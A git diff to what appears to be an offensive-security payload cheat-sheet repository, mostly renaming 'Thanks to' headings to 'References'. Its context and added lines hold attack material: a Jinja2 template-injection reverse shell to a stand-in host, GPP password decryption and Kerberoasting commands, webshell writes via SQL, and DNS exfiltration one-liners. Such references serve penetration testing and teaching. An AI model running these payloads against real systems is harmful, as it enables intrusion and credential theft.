diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 53e27d1..af9e326 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -149,7 +149,7 @@ List of Fortune1000 company names with permutations on .com, -backup, -media. Fo List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart. ``` -## Thanks to +## References * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php diff --git a/CRLF injection/README.md b/CRLF injection/README.md index de63586..862a3e5 100644 --- a/CRLF injection/README.md +++ b/CRLF injection/README.md @@ -95,7 +95,7 @@ Remainder: * %E5%98%BE = %3E = \u563e (>) * %E5%98%BC = %3C = \u563c (<) -## Thanks to +## References * https://www.owasp.org/index.php/CRLF_Injection * https://vulners.com/hackerone/H1:192749 diff --git a/CSV injection/README.md b/CSV injection/README.md index ab22368..5430482 100644 --- a/CSV injection/README.md +++ b/CSV injection/README.md @@ -25,7 +25,7 @@ Any formula can be started with @ ``` -## Thanks to +## References * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index e9c14b5..9191db2 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -339,7 +339,7 @@ Use the LFI to include the PHP session file login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` -## Thanks to +## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) diff --git a/Insecure deserialization/Java.md b/Insecure deserialization/Java.md index 50e90f8..f3606d1 100644 --- a/Insecure deserialization/Java.md +++ b/Insecure deserialization/Java.md @@ -63,7 +63,7 @@ JRE8u20_RCE_Gadget JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) -## Thanks to +## References - [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) diff --git a/Insecure deserialization/PHP.md b/Insecure deserialization/PHP.md index 3027932..883acf9 100644 --- a/Insecure deserialization/PHP.md +++ b/Insecure deserialization/PHP.md @@ -153,7 +153,7 @@ phpggc monolog/rce1 'phpinfo();' -s * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882) * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552) -## Thanks to +## References * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) diff --git a/Insecure deserialization/Python.md b/Insecure deserialization/Python.md index 1a1ef5b..41887f6 100644 --- a/Insecure deserialization/Python.md +++ b/Insecure deserialization/Python.md @@ -44,7 +44,7 @@ evil_token = b64encode(cPickle.dumps(e)) print("Your Evil Token : {}").format(evil_token) ``` -## Thanks to +## References * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) \ No newline at end of file diff --git a/Insecure deserialization/README.md b/Insecure deserialization/README.md index d2af35a..a0346d0 100644 --- a/Insecure deserialization/README.md +++ b/Insecure deserialization/README.md @@ -9,7 +9,7 @@ Check the following sub-sections, located in other files : * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) -## Thanks to +## References * [Github - ysoserial](https://github.com/frohoff/ysoserial) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) diff --git a/Insecure deserialization/Ruby.md b/Insecure deserialization/Ruby.md index 9564493..bf33886 100644 --- a/Insecure deserialization/Ruby.md +++ b/Insecure deserialization/Ruby.md @@ -6,7 +6,7 @@ Script to generate and verify the deserialization gadget chain against Ruby 2.0 for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done ``` -## Thanks to +## References - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) \ No newline at end of file diff --git a/Insecure direct object references/README.md b/Insecure direct object references/README.md index bf3bd97..0018ca4 100644 --- a/Insecure direct object references/README.md +++ b/Insecure direct object references/README.md @@ -41,7 +41,7 @@ http://foo.bar/accessPage?menuitem=12 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) -## Thanks to +## References * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) diff --git a/Insecure management interface/README.md b/Insecure management interface/README.md index da18d8d..9bb8511 100644 --- a/Insecure management interface/README.md +++ b/Insecure management interface/README.md @@ -2,8 +2,18 @@ ## Springboot-Actuator -Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. Some of them contains sensitive info such as `/trace` (by default the last 100 HTTP requests with headers), `/env` (the current environment properties) or `/heapdump` (builds and returns a heap dump from the JVM used by our application). These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default. +Actuator endpoints let you monitor and interact with your application. +Spring Boot includes a number of built-in endpoints and lets you add your own. +For example, the health endpoint provides basic application health information. +Some of them contains sensitive info such as : -the official documentation is located [here](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) +- `/trace` (by default the last 100 HTTP requests with headers) +- `/env` (the current environment properties) +- `/heapdump` (builds and returns a heap dump from the JVM used by our application). -## Thanks to +These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default. + + +## References + +* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) diff --git a/Insecure source code management/README.md b/Insecure source code management/README.md index d9e6258..53c8b09 100644 --- a/Insecure source code management/README.md +++ b/Insecure source code management/README.md @@ -167,7 +167,7 @@ git clone https://github.com/anantshri/svn-extractor.git python svn-extractor.py –url "url with .svn available" ``` -## Thanks to +## References - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) - [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 4165a0b..89090e0 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -136,7 +136,7 @@ Secret is "Sn1f" eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret ``` -## Thanks +## References - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/) diff --git a/LDAP injection/README.md b/LDAP injection/README.md index cdf5cec..ab77077 100644 --- a/LDAP injection/README.md +++ b/LDAP injection/README.md @@ -96,7 +96,7 @@ userPassword:2.5.13.18:=\xx\xx userPassword:2.5.13.18:=\xx\xx\xx ``` -## Thanks to +## References * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) diff --git a/LaTeX injection/README.md b/LaTeX injection/README.md index bf42890..6a02010 100644 --- a/LaTeX injection/README.md +++ b/LaTeX injection/README.md @@ -66,7 +66,7 @@ If you get any LaTex error, consider using base64 to get the result without bad \input{|"/bin/hostname"} ``` -## Thanks to +## References * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 82ed02e..d489d42 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -84,8 +84,8 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ```powershell pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share -ls # list files -cd +ls # list files +cd # move inside a folder get # download files put # replace a file ``` @@ -94,6 +94,18 @@ or ```powershell smbclient -I 10.10.10.100 -L ACTIVE -N -U "" + Sharename Type Comment + --------- ---- ------- + ADMIN$ Disk Remote Admin + C$ Disk Default share + IPC$ IPC Remote IPC + NETLOGON Disk Logon server share + Replication Disk + SYSVOL Disk Logon server share + Users Disk +use Sharename # select a Sharename +cd Folder # move inside a folder +ls # list files ``` Mount a share @@ -117,7 +129,10 @@ Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter ```bash echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 -e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 +e.g: +echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 + +echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 ``` Metasploit modules to enumerate shares and credentials @@ -319,7 +334,7 @@ TODO ### Kerberoast ```powershell -GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator > +$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator > Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies @@ -337,11 +352,6 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt ./john ~/hash.txt --wordlist=rockyou.lst ``` - -- https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf -- https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/ -- https://room362.com/post/2016/kerberoast-pt1/ - ### Pass-the-Hash The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. @@ -463,7 +473,7 @@ net user hacker2 hacker123 /add /Domain net group "Domain Admins" hacker2 /add /domain ``` -## Documentation / Thanks to +## References * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) @@ -490,4 +500,7 @@ net group "Domain Admins" hacker2 /add /domain * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) -* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) \ No newline at end of file +* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) +* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) +* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) +* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index a0ad6ab..b5895ac 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -121,7 +121,7 @@ The following directories are temporary and usually writeable /dev/shm/ ``` -## Thanks to +## References * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) diff --git a/Methodology and Resources/Metasploit CheatSheet.md b/Methodology and Resources/Metasploit CheatSheet.md index e6a8052..5313267 100644 --- a/Methodology and Resources/Metasploit CheatSheet.md +++ b/Methodology and Resources/Metasploit CheatSheet.md @@ -158,6 +158,6 @@ Add-WebTransport -Url http(s)://:/ -RetryWait 10 -RetryTotal 3 * MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue` * MS08_67 - `exploit/windows/smb/ms08_067_netapi` -## Thanks to +## References * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/) diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology_and_enumeration.md index 57b56d2..675c08c 100644 --- a/Methodology and Resources/Methodology_and_enumeration.md +++ b/Methodology and Resources/Methodology_and_enumeration.md @@ -268,7 +268,7 @@ International test card numbers and tokens | 4000002460000001 | tok_fi | Finland (FI) | Visa | | 4000002500000003 | tok_fr | France (FR) | Visa | -## Thanks to +## References * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/) * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 0ecfaaf..cd53bae 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -135,6 +135,6 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna If you have a segfault with nbtscan, read the following quote. > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 -## Thanks +## References * [TODO](TODO) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index be5a125..e69f7c0 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -165,7 +165,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc | remote host 1 | `ncat -l -p 8080 < file | | remote host 2 | `ncat -l -p 9090 > newfile` | -## Thanks to +## References * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index a967976..aca8882 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -223,7 +223,7 @@ stty rows columns !sh ``` -## Thanks to +## References * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md index 72fff2d..0806a99 100644 --- a/Methodology and Resources/Subdomains Enumeration.md +++ b/Methodology and Resources/Subdomains Enumeration.md @@ -177,7 +177,7 @@ go get github.com/Ice3man543/SubOver ./SubOver -l subdomains.txt ``` -## Thanks +## References * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/) * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Download and Execute.md b/Methodology and Resources/Windows - Download and Execute.md index 8e66c90..4f729b2 100644 --- a/Methodology and Resources/Windows - Download and Execute.md +++ b/Methodology and Resources/Windows - Download and Execute.md @@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http:// ``` -## Thanks to +## References - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index d6ba086..6df9c14 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -85,7 +85,7 @@ More informations can be grabbed from the Memory with : - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1) -## Thanks to +## References - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 8bddb02..4873b3d 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` -## Thanks to +## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md index 1847be4..9caea72 100644 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ b/Methodology and Resources/Windows - Post Exploitation Koadic.md @@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie. implant/utils/multi_module | Run a number of implants in succession. implant/utils/upload_file | Uploads a file from the listening server to the target zombies. -## Thanks +## References - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 93bdb7b..346ad27 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -206,7 +206,7 @@ wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -## Thanks to +## References * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index d94b811..5f848a4 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -137,7 +137,7 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell ``` -## Thanks +## References - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index 0fc0f85..811cd3b 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -84,7 +84,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi [$ne]=1 ``` -## Thanks to +## References * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/) * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) diff --git a/OAuth/README.md b/OAuth/README.md index f58d156..8553069 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -46,7 +46,7 @@ Applications that do not check for a valid CSRF token in the OAuth callback are > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request. -## Thanks to +## References * [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html) * [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html) diff --git a/Open redirect/README.md b/Open redirect/README.md index d2d6512..9ce644f 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md @@ -124,7 +124,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) ?return_path={payload} ``` -## Thanks to +## References * filedescriptor * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md index 75de094..2c7d7b1 100644 --- a/PHP juggling type/README.md +++ b/PHP juggling type/README.md @@ -56,7 +56,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); ?> ``` -## Thanks to +## References * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) * [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/) \ No newline at end of file diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 40df955..8235cca 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -156,7 +156,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) ``` -## Thanks to +## References * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/) * [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136) diff --git a/SQL injection/Cassandra Injection.md b/SQL injection/Cassandra Injection.md index 1084ce3..e66949e 100644 --- a/SQL injection/Cassandra Injection.md +++ b/SQL injection/Cassandra Injection.md @@ -32,6 +32,6 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php) -## Thanks to +## References * [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/) \ No newline at end of file diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md index de7290d..b71a95b 100644 --- a/SQL injection/MSSQL Injection.md +++ b/SQL injection/MSSQL Injection.md @@ -119,7 +119,7 @@ RECONFIGURE EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` -## Thanks to +## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 0143071..f90978a 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -125,3 +125,5 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ``` + +## References \ No newline at end of file diff --git a/SQL injection/OracleSQL Injection.md b/SQL injection/OracleSQL Injection.md index 71bd228..0228cd9 100644 --- a/SQL injection/OracleSQL Injection.md +++ b/SQL injection/OracleSQL Injection.md @@ -91,6 +91,6 @@ EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f7220726570 SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; ``` -## Thanks to +## References * [Heavily taken inspired by - NetSpi SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle) diff --git a/SQL injection/PostgreSQL Injection.md b/SQL injection/PostgreSQL Injection.md index cecd0bb..c92b4ae 100644 --- a/SQL injection/PostgreSQL Injection.md +++ b/SQL injection/PostgreSQL Injection.md @@ -44,6 +44,6 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` -## Thanks to +## References * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) \ No newline at end of file diff --git a/SQL injection/README.md b/SQL injection/README.md index 715c3d0..5d0a7bd 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -460,7 +460,7 @@ mysql> mysql> select version(); +-------------------------+ ``` -## Thanks to - Other resources +## References * Detect SQLi * [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md index fd48952..0631c0b 100644 --- a/SQL injection/SQLite Injection.md +++ b/SQL injection/SQLite Injection.md @@ -73,6 +73,6 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain'); Note: By default this component is disabled -## Thanks to +## References [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 3d645b9..20405a9 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -470,7 +470,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737) - [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612) -## Thanks to +## References - [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) - [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 153b320..2a91737 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -11,6 +11,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade ``` +## Methodology + +![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true) + ## Ruby ### Basic injection @@ -141,7 +145,7 @@ ${x} [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Jinja 2 - Basic injection +### Jinja2 - Basic injection ```python {{4*4}}[[5*5]] @@ -211,6 +215,33 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` +## Jinjava + + +### Jinjava - Basic injection + +```python +{{'a'.toUpperCase()}} would result in 'A' +{{ request }} would return a request object like 